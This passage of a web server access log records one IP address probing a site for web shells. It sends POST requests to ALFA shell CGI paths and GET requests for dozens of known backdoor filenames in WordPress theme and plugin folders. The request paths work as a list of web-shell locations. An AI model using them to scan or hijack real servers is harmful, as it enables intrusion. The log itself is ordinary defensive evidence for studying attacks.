Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:25 -0400] "POST /new/alfacgiapi/perl.alfa HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:25 -0400] "POST /new/alfacgiapi/perl.alfa HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:25 -0400] "POST /new/alfacgiapi/bash.alfa HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:25 -0400] "POST /new/alfacgiapi/bash.alfa HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:26 -0400] "POST /new/alfacgiapi/py.alfa HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:26 -0400] "POST /new/alfacgiapi/py.alfa HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:26 -0400] "GET /new/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:26 -0400] "GET /new/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:26 -0400] "GET /new/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:28 -0400] "POST /new/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:29 -0400] "POST /new/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:29 -0400] "POST /new/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:29 -0400] "POST /new/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:29 -0400] "POST /new/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:29 -0400] "POST /new/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:29 -0400] "GET /new/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:29 -0400] "GET /new/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:30 -0400] "GET /new/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:35 -0400] "POST /old/alfacgiapi/perl.alfa HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:36 -0400] "POST /old/alfacgiapi/perl.alfa HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:36 -0400] "POST /old/alfacgiapi/bash.alfa HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:36 -0400] "POST /old/alfacgiapi/bash.alfa HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:36 -0400] "POST /old/alfacgiapi/py.alfa HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:36 -0400] "POST /old/alfacgiapi/py.alfa HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:36 -0400] "GET /old/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:36 -0400] "GET /old/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:37 -0400] "GET /old/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:38 -0400] "POST /old/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:38 -0400] "POST /old/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:38 -0400] "POST /old/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:38 -0400] "POST /old/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:39 -0400] "POST /old/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:39 -0400] "POST /old/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:39 -0400] "GET /old/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:39 -0400] "GET /old/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:39 -0400] "GET /old/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:47 -0400] "POST /backup/alfacgiapi/perl.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:48 -0400] "POST /backup/alfacgiapi/perl.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:48 -0400] "POST /backup/alfacgiapi/bash.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:48 -0400] "POST /backup/alfacgiapi/bash.alfa HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:48 -0400] "POST /backup/alfacgiapi/py.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:48 -0400] "POST /backup/alfacgiapi/py.alfa HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:48 -0400] "GET /backup/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:48 -0400] "GET /backup/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:49 -0400] "GET /backup/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:51 -0400] "POST /backup/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:51 -0400] "POST /backup/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:51 -0400] "POST /backup/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:51 -0400] "POST /backup/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:52 -0400] "POST /backup/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:52 -0400] "POST /backup/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:52 -0400] "GET /backup/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:52 -0400] "GET /backup/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:04:52 -0400] "GET /backup/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:05:07 -0400] "GET /un.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:05:17 -0400] "GET /foxx.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:05:20 -0400] "GET /wawe.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:05:28 -0400] "GET /js.php?get HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:05:47 -0400] "GET /phpinfo.php?re@=vo@ HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:05:52 -0400] "GET /wp-email.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:05:56 -0400] "GET /wp-booking.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:05:59 -0400] "GET /fierza.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:06:04 -0400] "GET /load.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:06:11 -0400] "GET /wp-content/themes/fitnessbase/dev.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:06:18 -0400] "GET /wp-content/themes/fitnessbase/crp.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:06:23 -0400] "GET /alpha.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:06:24 -0400] "GET /tinyfilemanager.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:06:30 -0400] "GET /filemanager.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:06:35 -0400] "GET /manager.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:06:44 -0400] "GET /wp-content.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:00 -0400] "GET /wp-content/themes/alera/alpha.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:02 -0400] "GET /wp-content/plugins/wp-diambar/includes/loadme.php HTTP/1.1" 301 280 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:07 -0400] "GET /lock360.php?daksldlkdsadas=1 HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:14 -0400] "GET /5.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:20 -0400] "GET /01.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:24 -0400] "GET /.well-known/pki-validation/wp-signup.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:30 -0400] "GET /.well-known/wp-signup.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:34 -0400] "GET /jindex.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:47 -0400] "GET /0o.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:51 -0400] "GET /ciis.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:07:56 -0400] "GET /zfox.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:08:04 -0400] "GET /zf.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:08:16 -0400] "GET /room.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:08:24 -0400] "GET /xd.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:08:29 -0400] "GET /adriv.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:08:30 -0400] "GET /wp-content/themes/travel/issue.php 